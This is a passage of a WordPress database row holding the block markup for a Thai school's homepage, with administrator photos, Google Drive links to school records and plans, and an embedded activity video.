(728,1,'2025-07-15 17:15:14','2025-07-15 10:15:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" 